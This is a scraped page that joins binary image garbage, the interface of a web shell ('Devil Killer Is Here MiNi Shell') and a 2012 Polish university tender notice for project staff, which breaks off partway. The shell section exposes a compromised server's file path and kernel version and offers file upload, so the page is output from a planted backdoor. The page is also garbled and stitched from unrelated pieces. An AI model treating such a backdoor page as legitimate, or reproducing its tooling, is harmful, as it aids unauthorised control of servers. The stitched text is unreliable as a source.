JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121031/426686-N-2012.html

<p class="kh_header"><b>Kraków: Dobór personelu do realizacji projektu pn. Technolog Chemiczny- Inżynier Przyszłości</b><br>
<b>Numer ogłoszenia: 426686 - 2012; data zamieszczenia: 31.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Krakowska im. Tadeusza Kościuszki Dział Zamówień Publicznych , ul. Warszawska 24, 31-155 Kraków, woj. małopolskie, tel. 12 628 26 56; 628 22 20, faks 12 6282072.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pk.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dobór personelu do realizacji projektu pn. Technolog Chemiczny- Inżynier Przyszłości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1   Temat: Dobór personelu-kierownika projektu  do realizacji projektu pn. Technolog Chemiczny- Inżynier Przyszłości 
Opis: 
Wykonawca do zrealizowania zamówienia wskaże jedną osobę.
Ilość godzin: 132 godz./miesiąc - 40 miesięcy
Zakres wykonywanych zadań na stanowisku Kierownika Projektu:
1	Zarządzanie projektem - monitorowanie przebiegu realizacji projektu
2	Nadzór nad prawidłową realizacją projektu
3	Planowanie i koordynacja działań
4	Monitoring i analiza przepływów finansowych w projekcie
5	Weryfikacja terminowości i poprawności sporządzania wniosków o płatność
6	Nadzór nad działaniami marketingowymi związanymi z promocją projektu
7	Organizowanie spotkań zespołu projektowego
8	Zarządzanie ryzykiem projektu
9	Bieżąca kontrola osiągania założonych rezultatów
10	Odpowiedzialność za terminowość, prawidłowość i aktualizację realizacji harmonogramu
11	Kontakty z Instytucją Pośredniczącą
12	Sprawozdawczość

Zadanie nr 2   Temat: Dobór personelu- asystenta ds. wyjazdów i kontaktów z przemysłem do realizacji projektu pn. Technolog Chemiczny- Inżynier Przyszłości 
Opis: 
Wykonawca do zrealizowania zamówienia wskaże jedną osobę
Ilość godzin: 90 godz./miesiąc - 40 miesięcy
Zakres wykonywanych zadań na stanowisku Asystenta ds. wyjazdów 
i kontaktów z przemysłem
1	Wspieranie kierownika projektu w zakresie koordynowania zadań w ramach projektu, w tym: 
planowania zadań do realizacji zgodnie z opracowanym harmonogramem rzeczowo-finansowym projektu;opracowywania i aktualizacji planów i harmonogramów poszczególnych etapów realizacji projektu;
2	Wspieranie kierownika projektu w zakresie ustanawiania regulaminów w ramach realizacji projektu.
3	Współdziałanie z kierownikiem projektu oraz jednostkami organizacyjnymi uczelni zaangażowanymi w realizację projektu
4	Organizacja zadań w ramach projektu, w tym: 
realizowanie i wdrażanie projektu w oparciu o jego harmonogram i budżet oraz właściwe przepisy prawne i organizacyjne;
organizowanie pracy zespołu projektowego;opracowywanie projektów procedur wewnętrznych dotyczących realizacji projektu;przygotowywanie spotkań w ramach projektu; uczestniczenie w spotkaniach; sporządzanie sprawozdań ze spotkań;
5	Nawiązywanie i podtrzymywanie kontaktów z ośrodkami naukowymi i przemysłowymi w kraju i za granicą.
6	Sprawowanie kontroli nad realizacją kolejnych etapów projektu w zakresie organizacji wyjazdów, w tym zgodności z planami, założeniami, harmonogramami, umowami oraz innymi dokumentami dotyczącymi realizacji projektu i informowanie na bieżąco kierownika projektu.
7	Organizacja tematycznych wyjazdów studyjnych do krajowych i zagranicznych ośrodków naukowych i przemysłowych.
8	Opieka nad grupą studentów w trakcie wyjazdów studyjnych do krajowych i zagranicznych ośrodków naukowych i przemysłowych.

Zadanie nr 3     Temat:  Dobór personelu- asystenta ds. kursów, szkoleń i warsztatów do realizacji projektu pn. Technolog Chemiczny- Inżynier Przyszłości 
Opis: 
Wykonawca do zrealizowania zamówienia wskaże jedną osobę
Ilość godzin: 90 godz./miesiąc - 40 miesięcy
Zakres wykonywanych zadań na stanowisku Asystenta ds. kursów, 
szkoleń i warsztatów
1	Wspieranie kierownika projektu w zakresie koordynowania zadań w ramach projektu związanych z organizacją kursów, szkoleń, zajęć wyrównawczych i warsztatów.
2	Współdziałanie z kierownikiem projektu, oraz jednostkami organizacyjnymi uczelni zaangażowanymi w realizację projektu.
3	Organizacja kursów językowych dla studentów kierunku Technologia chemiczna.
4	Organizacja zajęć wyrównawczych z przedmiotów ścisłych: matematyka, fizyka, chemia dla studentów I roku kierunku Technologia chemiczna.
5	Organizacja specjalistycznych kursów komputerowych.
6	Organizacja warsztatów z przedsiębiorczości, ekonomii oraz zakładania firmy.
7	Organizacja warsztatów tematycznych z udziałem producentów i dystrybutorów aparatury badawczej.
8	Organizacja kursu specjalistycznego REACH.
9	Organizacja szkoleń z ochrony środowiska naturalnego i rozwiązań proekologicznych w procesie produkcji
10	Organizacja zadań w ramach projektu, w tym: 
realizowanie i wdrażanie projektu w oparciu o jego harmonogram i budżet oraz właściwe przepisy prawne i organizacyjne;opracowywanie projektów procedur wewnętrznych dotyczących realizacji projektu;uczestniczenie w spotkaniach w ramach projektu

Zadanie nr 4    Temat: Dobór personelu- asystenta ds. administracyjnych i ewaluacji projektu do realizacji projektu pn. Technolog Chemiczny- Inżynier Przyszłości 
Opis:
Wykonawca do zrealizowania zamówienia wskaże jedną osobę
Ilość godzin:  70 godz./miesiąc - 40 miesięcy
Zakres wykonywanych zadań na stanowisku Asystenta ds. administracyjnych 
i ewaluacji projektu
1	Wykonywanie czynności administracyjno-biurowych niezbędnych do realizacji projektu.
2	Współdziałanie z kierownikiem projektu, oraz jednostkami organizacyjnymi uczelni zaangażowanymi w realizację projektu
3	Organizacja zadań w ramach projektu, w tym: 
realizowanie i wdrażanie projektu w oparciu o jego harmonogram i budżet oraz właściwe przepisy prawne i organizacyjne;
organizowanie pracy zespołu projektowego;
opracowywanie projektów procedur wewnętrznych dotyczących realizacji projektu;
przygotowywanie spotkań w ramach projektu; uczestniczenie w spotkaniach;
4	Sprawdzanie pod względem merytorycznym i formalnym wszelkich dokumentów, pism, opracowań itp.
5	Sprawowanie kontroli nad realizacją kolejnych etapów projektu, w tym zgodności z planami, założeniami, harmonogramami, umowami oraz innymi dokumentami dotyczącymi realizacji projektu i informowanie na bieżąco kierownika projektu
6	Rekrutacja i monitoring uczestników projektu, w tym zbieranie i weryfikacja danych za pomocą ankiet ewaluacyjnych, sprawozdań, testów kompetencji, list obecności, zbieranie danych i ich uzupełnianie w systemie PEFS
7	Utworzenie i aktualizacje strony www projektu
8	Działania informacyjne, w tym zamieszczanie ogłoszeń na stronie www projektu 
i WIiTCh oraz przygotowywanie i rozsyłanie korespondencji listownej oraz mailowej do uczestników i personelu projektu
9	Weryfikacja kompletności wniosków stypendialnych
10	Wprowadzanie danych do systemu HMS
11	Tworzenie list stypendialnych
12	Generowanie plików do przelewów świadczeń stypendialnych
13	Monitorowanie statusów studentów oraz wypłacanych świadczeń
14	Merytoryczne wsparcie zespołu przy tworzeniu i ew. zmianach regulaminu stypendialnego projektu

Zadanie nr 5    Temat: Dobór personelu- specjalista ds. finansowych do realizacji projektu pn. Technolog Chemiczny- Inżynier Przyszłości 
Opis: 
Wykonawca do zrealizowania zamówienia wskaże jedną osobę
Ilość godzin: 70 godz./miesiąc - 40 miesięcy
Zakres wykonywanych zadań na stanowisku Specjalisty ds. finansowych
1	Wykonywanie czynności księgowych i kadrowych niezbędnych do realizacji projektu i koordynacja realizacji finansowej projektu - zgodność wydatków poszczególnych zadań z planowanym budżetem, korekty budżetu.
2	Rozliczanie wydatków w projekcie.
3	Wspieranie kierownika projektu w zakresie koordynowania zadań w ramach projektu, w tym: 
planowania zadań do realizacji zgodnie z opracowanym harmonogramem rzeczowo-finansowym projektu.
4	Współdziałanie z kierownikiem projektu oraz jednostkami organizacyjnymi uczelni zaangażowanymi w realizację projektu.
5	Organizacja zadań w ramach projektu, w tym: 
realizowanie i wdrażanie projektu w oparciu o jego harmonogram i budżet oraz właściwe przepisy prawne i organizacyjne;opracowywanie projektów procedur wewnętrznych dotyczących realizacji projektu;uczestniczenie w spotkaniach w ramach projektu
6	Sprawdzanie pod względem formalnym i rachunkowym dokumentów, pism, itp.
7	Sprawowanie kontroli nad częścią finansową projektu, w tym zgodności z planami, założeniami, harmonogramami, umowami oraz innymi dokumentami dotyczącymi realizacji projektu i informowanie na bieżąco kierownika projektu.
8	Kontakty z Instytucją Pośredniczącą
9	Przygotowywanie umów cywilno-prawnych, prowadzenie ewidencji czasu pracy, opisywanie faktur, archiwizacja na WIiTCh 
10	Przygotowywanie w zespole projektowym wniosków o płatność
11 	Przygotowanie sprawozdań..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca biorący udział w postępowaniu musi wykazać, że dysponuje co najmniej jedną osobą, która będzie posiadać następujące kwalifikacje:
-W zadaniu nr 1:
1	Wykształcenie wyższe na kierunku Technologia Chemiczna, stopień naukowy doktora 
2	Minimum 3 lata stażu pracy na uczelni wyższej technicznej oraz doświadczenie dydaktyczne 
3	Doświadczenie w kierowaniu projektami, w tym projektami w obszarze technicznym
4	Znajomość zagadnień dot. Równościowej realizacji i zarządzania projektami Programu Operacyjnego Kapitał Ludzki (PO KL) 
5	Znajomość przepisów wyższej uczelni w tym Statutu PK, Regulaminu studiów, Ustawy o szkolnictwie wyższym, przepisów dot. świadczeń pomocy materialnej na PK, znajomość standardów dla kierunków chemicznych i technicznych 
6	Znajomość specyfiki kierunku Technologia chemiczna
7	Znajomość problematyki związanej z realizacją projektów, wykształcenie kierunkowe z  zakresu zarządzania projektami - studia podyplomowe, kursy, szkolenia 
8	Znajomość programów z pakietu MS Office 
9	Znajomość języka angielskiego w stopniu co najmniej średnio zaawansowanym 
10	Ukończony kurs pedagogiczny poświadczający kwalifikacje pedagogiczne konieczne na uczelni wyższej 
-W zadaniu nr 2:
1	Wykształcenie wyższe, oraz posiadanie tytułu co najmniej magistra
2	Minimum 3 lata stażu pracy na uczelni wyższej - doświadczenie w pracy dydaktycznej i administracyjno-biurowej oraz przy obsłudze studentów 
3	Doświadczenie na stanowisku związanym z realizacją projektów unijnych 
4	Doświadczenie w organizowaniu wyjazdów dydaktycznych i technologicznych krajowych i zagranicznych 
5	Znajomość problematyki związanej z realizacją projektów unijnych 
6	Znajomość przepisów wyższej uczelni w tym Statutu PK, Regulaminu studiów, Ustawy o szkolnictwie wyższym 
7	Wiedza z zakresu prawa zamówień publicznych 
8	Znajomość języka angielskiego w stopniu co najmniej średnio zaawansowanym 
9	Znajomość języków: rosyjskiego, czeskiego, słowackiego w stopniu podstawowym
-w zadaniu nr 3: 
1	Wykształcenie wyższe na kierunku Technologia chemiczna, oraz posiadanie tytułu co najmniej magistra
2	Minimum 1,5 roku stażu pracy na uczelni wyższej technicznej oraz minimum 1 rok doświadczenia w pracy dydaktycznej 
3	Doświadczenie w kierowaniu projektami, w tym projektami w obszarze technicznym
4	Znajomość problematyki związanej z realizacją projektów, wykształcenie kierunkowe z zakresu zarządzania projektami - studia podyplomowe, kursy, szkolenia 
5	Znajomość przepisów wyższej uczelni w tym Statutu PK, Regulaminu studiów, Ustawy o szkolnictwie wyższym  
6	Znajomość języka angielskiego w stopniu co najmniej średnio zaawansowanym 
7	Znajomość pakietu MS Office 
8	Znajomość specyfiki kierunku Technologia chemiczna
9	Ukończony kurs pedagogiczny poświadczający kwalifikacje pedagogiczne konieczne na uczelni wyższej 
-w zadaniu nr 4:
1	Wykształcenie wyższe, oraz posiadanie tytułu co najmniej magistra
2	Minimum 5 lat stażu pracy na uczelni wyższej w strukturach administracyjnych:, doświadczenie w pracy administracyjno-biurowej oraz przy obsłudze studentów
3	Doświadczenie na stanowisku związanym z realizacją projektów unijnych 
4	Znajomość problematyki związanej z realizacją projektów unijnych
5	Znajomość przepisów wyższej uczelni w tym Statutu PK, Regulaminu studiów, Ustawy o szkolnictwie wyższym, przepisów dot. świadczeń pomocy materialnej na PK 
6	Wiedza z zakresu prawa zamówień publicznych 
8	Znajomość pakietu MS Office 
9	Znajomość programu HMS dsys 
10	Doświadczenie w administracji portalami internetowymi, znajomość  wordpress 

-W zadaniu nr 5:
1	Wykształcenie co najmniej średnie
2	Minimum 5 lat stażu pracy na uczelni wyższej w strukturach administracyjnych:, doświadczenie w pracy administracyjno-biurowej 
3	Udokumentowana znajomość zagadnień  w zakresie:
Kontroli Zarządczej w Szkołach Wyższych oraz podatku VAT w Szkołach Wyższych 
4	Znajomość problematyki związanej z realizacją projektów unijnych
5	Znajomość przepisów wyższej uczelni w tym Statutu PK, Regulaminu studiów, Ustawy o szkolnictwie wyższym PK 
6	Wiedza z zakresu prawa zamówień publicznych 
7	Znajomość pakietu MS Office 
8	Znajomość generatora wniosków płatniczych POKL 

Warunki będą oceniane przez Zamawiającego na zasadzie spełnia - nie spełnia. Podstawą oceny będą dokumenty i oświadczenia dołączone przez wykonawcę do oferty potwierdzające ich spełnianie.
Wykonawca musi wskazać jedną osobę fizyczną do realizacji zamówienia.
Nie spełnienie powyższych warunków (w tym brak oświadczeń) przez wykonawcę będzie skutkowało wykluczeniem wykonawcy z postępowania o udzielenie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty - Załącznik nr 1 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy wymagają zgody stron w formie pisemnej pod rygorem nieważności.
2.	Zleceniodawca dopuszcza możliwość zmiany umowy w następującym zakresie:
1)	Osoby przewidzianej do realizacji zamówienia z przyczyn losowych np. choroba pod warunkiem, że osoba zaproponowana przez Zleceniobiorcę będzie posiadać takie same kwalifikacje jak osoba wskazana w umowie i zostanie zaakceptowana przez Zleceniodawcę.
2)	Terminu realizacji usługi wynikającej z umowy gdy będzie to podyktowane czynnikami niezależnymi od Zleceniobiorcy np. siły wyższej, czy tez wytycznymi instytucji pośredniczącej. Przesunięcie terminu realizacji będzie również możliwe w przypadku wprowadzenia zmian do wniosku o dofinansowanie.
3.	Zmiany przewidziane w umowie mogą być inicjowane przez Zleceniodawcę oraz przez Zleceniobiorcę.
4.	Warunkiem dokonania zmian w umowie jest złożenie wniosku przez stronę inicjującą zamianę zawierającego: opis propozycji zmian, uzasadnienie zmian, opis wypływu zmiany na termin wykonania umowy.
5.	Ewentualne spory wynikające z niniejszej umowy będą rozpatrywane przez sąd właściwy dla siedziby Zleceniodawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pk.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, budynek W-9, pok.110.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.11.2012 godzina 10:00, miejsce: w siedzibie Zamawiającego, budynek W-9, pok.110.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Technolog Chemiczny- Inżynier Przyszłości,  współfinansowany ze środków Unii europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dobór personelu-kierownika projektu  do realizacji projektu pn. Technolog Chemiczny- Inżynier Przyszłości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca do zrealizowania zamówienia wskaże jedną osobę.
Ilość godzin: 132 godz./miesiąc - 40 miesięcy
Zakres wykonywanych zadań na stanowisku Kierownika Projektu:
1.Zarządzanie projektem - monitorowanie przebiegu realizacji projektu
2.Nadzór nad prawidłową realizacją projektu
3.Planowanie i koordynacja działań
4.Monitoring i analiza przepływów finansowych w projekcie
5.Weryfikacja terminowości i poprawności sporządzania wniosków o płatność
6.Nadzór nad działaniami marketingowymi związanymi z promocją projektu
7.Organizowanie spotkań zespołu projektowego
8.Zarządzanie ryzykiem projektu
9.Bieżąca kontrola osiągania założonych rezultatów
10.Odpowiedzialność za terminowość, prawidłowość i aktualizację realizacji harmonogramu
11.Kontakty z Instytucją Pośredniczącą
12.Sprawozdawczość.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dobór personelu- asystenta ds. wyjazdów i kontaktów z przemysłem do realizacji projektu pn. Technolog Chemiczny- Inżynier Przyszłości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca do zrealizowania zamówienia wskaże jedną osobę
Ilość godzin: 90 godz./miesiąc - 40 miesięcy
 Zakres wykonywanych zadań na stanowisku Asystenta ds. wyjazdów 
i kontaktów z przemysłem:
1.Wspieranie kierownika projektu w zakresie koordynowania zadań w ramach projektu, w tym: 
planowania zadań do realizacji zgodnie z opracowanym harmonogramem rzeczowo-finansowym projektu;
opracowywania i aktualizacji planów i harmonogramów poszczególnych etapów realizacji projektu;
2.Wspieranie kierownika projektu w zakresie ustanawiania regulaminów w ramach realizacji projektu.
3.Współdziałanie z kierownikiem projektu oraz jednostkami organizacyjnymi uczelni zaangażowanymi w realizację projektu
4.Organizacja zadań w ramach projektu, w tym: 
realizowanie i wdrażanie projektu w oparciu o jego harmonogram i budżet oraz właściwe przepisy prawne i organizacyjne;
organizowanie pracy zespołu projektowego;
opracowywanie projektów procedur wewnętrznych dotyczących realizacji projektu;
przygotowywanie spotkań w ramach projektu; uczestniczenie w spotkaniach; sporządzanie sprawozdań ze spotkań;
5.Nawiązywanie i podtrzymywanie kontaktów z ośrodkami naukowymi i przemysłowymi w kraju i za granicą.
6.Sprawowanie kontroli nad realizacją kolejnych etapów projektu w zakresie organizacji wyjazdów, w tym zgodności z planami, założeniami, harmonogramami, umowami oraz innymi dokumentami dotyczącymi realizacji projektu i informowanie na bieżąco kierownika projektu.
7.Organizacja tematycznych wyjazdów studyjnych do krajowych i zagranicznych ośrodków naukowych i przemysłowych.
8.Opieka nad grupą studentów w trakcie wyjazdów studyjnych do krajowych i zagranicznych ośrodków naukowych i przemysłowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dobór personelu- asystenta ds. kursów, szkoleń i warsztatów do realizacji projektu pn. Technolog Chemiczny- Inżynier Przyszłości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca do zrealizowania zamówienia wskaże jedną osobę
Ilość godzin: 90 godz./miesiąc - 40 miesięcy
Zakres wykonywanych zadań na stanowisku Asystenta ds. kursów, 
szkoleń i warsztatów:
